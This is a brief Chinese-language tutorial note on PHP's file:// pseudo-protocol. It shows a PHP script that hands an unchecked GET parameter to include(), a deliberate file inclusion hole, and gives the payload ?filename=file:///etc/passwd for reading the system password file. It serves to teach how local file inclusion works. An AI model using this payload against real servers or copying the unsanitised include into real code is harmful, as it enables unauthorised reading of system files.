file://伪协议
file://伪协议可以访问本地文件系统,读取文件的内容。
源码
<?php
if(isset($_GET['filename'])){
$filename = $_GET['filename'];
include($filename);
}else{
exit();
}
?>
这个就是一个简单的文件包含
获取内容
这里获取passwd文件内容
?filename=file:///etc/passwd
两个内容是一样的